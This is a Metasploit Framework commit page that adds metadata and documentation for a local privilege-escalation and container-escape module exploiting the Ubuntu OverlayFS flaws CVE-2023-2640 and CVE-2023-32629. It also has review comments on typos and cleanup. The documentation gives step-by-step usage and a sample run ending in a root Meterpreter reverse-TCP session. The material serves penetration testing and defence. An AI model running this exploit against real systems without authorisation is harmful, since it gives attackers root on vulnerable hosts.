Commit
Merge remote-tracking branch 'upstream/master'
certcc-ghbot committed Dec 19, 2024
2 parents 7fb4c3e + e2a248e commit 0dcf866
Showing 6 changed files with 412 additions and 3 deletions.
2 changes: 1 addition & 1 deletion Gemfile.lock
@@ -1,7 +1,7 @@
PATH
remote: .
specs:
metasploit-framework (6.4.41)
metasploit-framework (6.4.42)
aarch64
abbrev
actionpack (~> 7.0.0)
2 changes: 1 addition & 1 deletion LICENSE_GEMS
Expand Up @@ -88,7 +88,7 @@ memory_profiler, 1.1.0, MIT
metasm, 1.0.5, LGPL-2.1
metasploit-concern, 5.0.3, "New BSD"
metasploit-credential, 6.0.11, "New BSD"
metasploit-framework, 6.4.41, "New BSD"
metasploit-framework, 6.4.42, "New BSD"
metasploit-model, 5.0.2, "New BSD"
metasploit-payloads, 2.0.189, "3-clause (or ""modified"") BSD"
metasploit_data_models, 6.0.5, "New BSD"
65 changes: 65 additions & 0 deletions db/modules_metadata_base.json
Expand Up @@ -88994,6 +88994,71 @@

]
},
"exploit_linux/local/gameoverlay_privesc": {
"name": "GameOver(lay) Privilege Escalation and Container Escape",
"fullname": "exploit/linux/local/gameoverlay_privesc",
"aliases": [

],
"rank": 300,
"disclosure_date": "2023-07-26",
"type": "exploit",
"author": [
"g1vi",
"h00die",
"bwatters-r7",
"gardnerapp"
],
"description": "This module exploits the use of unsafe functions in a number of Ubuntu kernels\n utilizing vunerable versions of overlayfs. To mitigate CVE-2021-3493 the Linux\n kernel added a call to vfs_setxattr during ovl_do_setxattr. Due to independent\n changes to the kernel by the Ubuntu development team __vfs_setxattr_noperm is\n called during ovl_do_setxattr without calling the intermediate safety function\n vfs_setxattr. Ultimatly this module allows for root access to be achieved by\n writing setuid capabilities to a file which are not sanitized after being unioned\n with the upper mounted directory.",
"references": [
"URL-https://www.crowdstrike.com/blog/crowdstrike-discovers-new-container-exploit/",
"URL-https://github.com/g1vi/CVE-2023-2640-CVE-2023-32629",
"URL-https://www.cvedetails.com/cve/CVE-2023-2640/",
"URL-https://www.cvedetails.com/cve/CVE-2023-32629/",
"URL-https://www.wiz.io/blog/ubuntu-overlayfs-vulnerability",
"CVE-2023-32629",
"CVE-2023-2640"
],
"platform": "Linux,Unix",
"arch": "",
"rport": null,
"autofilter_ports": [

],
"autofilter_services": [

],
"targets": [
"Linux_Binary",
"Linux_Command"
],
"mod_time": "2024-12-17 16:52:24 +0000",
"path": "/modules/exploits/linux/local/gameoverlay_privesc.rb",
"is_install_path": true,
"ref_name": "linux/local/gameoverlay_privesc",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
"Stability": [
"crash-safe"
],
"Reliability": [
"repeatable-session"
],
"SideEffects": [
"artifacts-on-disk"
]
},
"session_types": [
"shell",
"meterpreter"
],
"needs_cleanup": true,
"actions": [

]
},
"exploit_linux/local/glibc_ld_audit_dso_load_priv_esc": {
"name": "glibc LD_AUDIT Arbitrary DSO Load Privilege Escalation",
"fullname": "exploit/linux/local/glibc_ld_audit_dso_load_priv_esc",
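Review bot: the `"description"` string of the new `exploit_linux/local/gameoverlay_privesc` entry carries two spelling errors, `vunerable` and `Ultimatly`, that will be shown verbatim in `info` output; since this file is generated from the module's own metadata, fix them in the module's description and regenerate the JSON rather than hand-editing it here. Also note `"arch": ""` is empty while both `Linux_Binary` and `Linux_Command` targets are declared; confirm that is intended for this module.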
157 changes: 157 additions & 0 deletions documentation/modules/exploit/linux/local/gameoverlay_privesc.md
@@ -0,0 +1,157 @@
## Description

CVE-2023-2640 and CVE-2023-32629 are vulnerabilities that allow for the arbitrary setting of
capabilities while overlaying filesystems. On most Linux Kernels during the execution of
`ovl_do_setxattr` an intermediate function `vfs_setxatrr` converts file capabilities in a
way that limits them to the current namespace. However, on some versions of the Ubuntu kernel
`_vfs_setxattr_noperm` is called directly without calling `vfs_setxattr`.

When a new namespace is created the user will technically be "root" within that given
namespace. This module will take advantage of this by setting the `CAP_SETUID` capability
on a system binary. It will then perform filesystem overlay, copying the binary into the lower
directory. Because of the flaws described above when the binary is transferred into the upper
directory its capabilities will not be sanitized and persist in the "normal" namespace.

## Vunerable Application

These vulnerabilities are somewhat unique in that they effect a wide variety of Ubuntu releases
and kernel versions, as described in the list below.

Ubuntu 23.04 (Lunar Lobster)m kernel 6.2.0, (CVE-2023-2640 & CVE-2023-32629)

Ubuntu 22.10 (Kinetic Kudu), kernel -> 5.19.0, (CVE-2023-2640 & CVE-2023-32629)

Ubuntu 22.04 LTS (Jammy Jellyfish), kernel -> 5.19.0, (CVE-2023-2640 & CVE-2023-32629)

Ubuntu 22.04 LTS (Jammy Jellyfish), kernel -> 6.2.0, (CVE-2023-2640 & CVE-2023-32629)

Ubuntu 20.04 LTS (Focal Fossa), kernel -> 5.4.0, (CVE-2023-32629)

Ubuntu 18.04 LTS (Bionic Beaver), kernel -> 5.4.0, (CVE-2023-32629)

The user can download a vulnerable version, for example:

```
sudo apt update
sudo apt install -y linux-image-5.19.0-41-generic linux-headers-5.19.0-41-generic
reboot
```
While testing, @bwatters7 mentioned taking the system offline as this appears to be patched automatically.
Be sure to take the system offline to prevent the vulnerabilities from silently being patched.

This module has successfully been tested on the following:

Ubuntu 22.04 LTS (Jammy Jellyfish) 5.19.0-41-generic

Ubuntu 20.04 LTS (Focal Fossa) 5.4.0-1018-aws

## Verification Steps

1). Start `msfconsole`

2). Get a session on a vulnerable system

3). Use `exploit/linux/local/gameoverlay_privesc`

4). Optional: choose target for payload, either linux binary (0) or [li|u]nix command (1)
`set target 1`

5). Set session `set session [SESSION]`

5). Do. `run`

6). You should get a new session running as root.

## Options

### Payload File Name
Name of the file storing the payload, default is random.

### Writable Dir
The name of a directory with write permissions, default is `/tmp`. This will be where the
payload file will be created if necessary. Additionally during the exploit a series of directories will be
created here to perform the filesystem overlaying.

## Scenarios

You have a non-root session on one of the systems described above. Please note that this
module will automatically run checks to determine if the system is vulnerable, you can disable
this with `set AutoCheck False`.

```
msf6 exploit(linux/local/gameoverlay_privesc) >
[*] Sending stage (3045380 bytes) to 10.5.132.129
[*] Meterpreter session 3 opened (10.5.135.201:4585 -> 10.5.132.129:33504) at 2024-12-18 14:02:15 -0600
msf6 exploit(linux/local/gameoverlay_privesc) > set session 3
session => 3
msf6 exploit(linux/local/gameoverlay_privesc) > show options
Module options (exploit/linux/local/gameoverlay_privesc):
Name Current Setting Required Description
---- --------------- -------- -----------
PayloadFileName pSueaCXrnzH yes Name of payload
SESSION 3 yes The session to run this module on
WritableDir /tmp yes A directory where we can write files
Payload options (linux/x64/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 10.5.135.201 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Linux_Binary
View the full module info with the info, or info -d command.
msf6 exploit(linux/local/gameoverlay_privesc) > run
[*] Started reverse TCP handler on 10.5.135.201:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Detected Ubuntu version: Jammy Jellyfish
[*] Detected kernel version: 5.19.0-41-generic
[+] The target is vulnerable. Jammy Jellyfish with 5.19.0-41-generic kernel is vunerable
[*] Creating directory to store payload: /tmp/ODBpneOXk/
[*] Creating directory /tmp/ODBpneOXk/
[*] /tmp/ODBpneOXk/ created
[*] Creating directory /tmp/ODBpneOXk/
[*] Creating directory /tmp/ODBpneOXk/
[*] /tmp/ODBpneOXk/ created
[*] Creating directory /tmp/ODBpneOXk/bmbtPAX/
[*] Creating directory /tmp/ODBpneOXk/bmbtPAX/
[*] /tmp/ODBpneOXk/bmbtPAX/ created
[*] Creating directory /tmp/ODBpneOXk/JtNbwLXJKw/
[*] Creating directory /tmp/ODBpneOXk/JtNbwLXJKw/
[*] /tmp/ODBpneOXk/JtNbwLXJKw/ created
[*] Creating directory /tmp/ODBpneOXk/hEhbByWL/
[*] Creating directory /tmp/ODBpneOXk/hEhbByWL/
[*] /tmp/ODBpneOXk/hEhbByWL/ created
[*] Creating directory /tmp/ODBpneOXk/yvvSFre/
[*] Creating directory /tmp/ODBpneOXk/yvvSFre/
[*] /tmp/ODBpneOXk/yvvSFre/ created
[*] Writing payload: /tmp/ODBpneOXk/pSueaCXrnzH
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3045380 bytes) to 10.5.132.129
[*] rm: cannot remove '/tmp/ODBpneOXk/yvvSFre/': Device or resource busy
[*] Meterpreter session 4 opened (10.5.135.201:4444 -> 10.5.132.129:44400) at 2024-12-18 14:02:42 -0600
meterpreter > getuid
Server username: root
meterpreter > sysinfo
Computer : 10.5.132.129
OS : Ubuntu 22.04 (Linux 5.19.0-41-generic)
Architecture : x64
BuildTuple : x86_64-linux-musl
Meterpreter : x64/linux
```
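Review bot: the new documentation has several correctness and editing issues that should be fixed before merge. The kernel function is `__vfs_setxattr_noperm` (two leading underscores, as in the module description), but the Description paragraph writes `_vfs_setxattr_noperm`, and `vfs_setxatrr` in the same paragraph should read `vfs_setxattr`. The heading `## Vunerable Application` should be `## Vulnerable Application`, `effect a wide variety of Ubuntu releases` should be `affect`, and `Ubuntu 23.04 (Lunar Lobster)m kernel 6.2.0` has a stray `m` where the other entries use a comma. Under Verification Steps two consecutive items are numbered `5).`, so `run` and the root-session step should become 6) and 7). Finally, the sample run shows `rm: cannot remove '/tmp/ODBpneOXk/yvvSFre/': Device or resource busy` during cleanup, which is consistent with that directory still being a mount point when it is removed; worth confirming the module unmounts the overlay before deleting its working directories, and otherwise documenting the leftover mount alongside the `artifacts-on-disk` side effect.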
2 changes: 1 addition & 1 deletion lib/metasploit/framework/version.rb
Expand Up @@ -32,7 +32,7 @@ def self.get_hash
end
end

VERSION = "6.4.41"
VERSION = "6.4.42"
MAJOR, MINOR, PATCH = VERSION.split('.').map { |x| x.to_i }
PRERELEASE = 'dev'
HASH = get_hash
0 comments on commit 0dcf866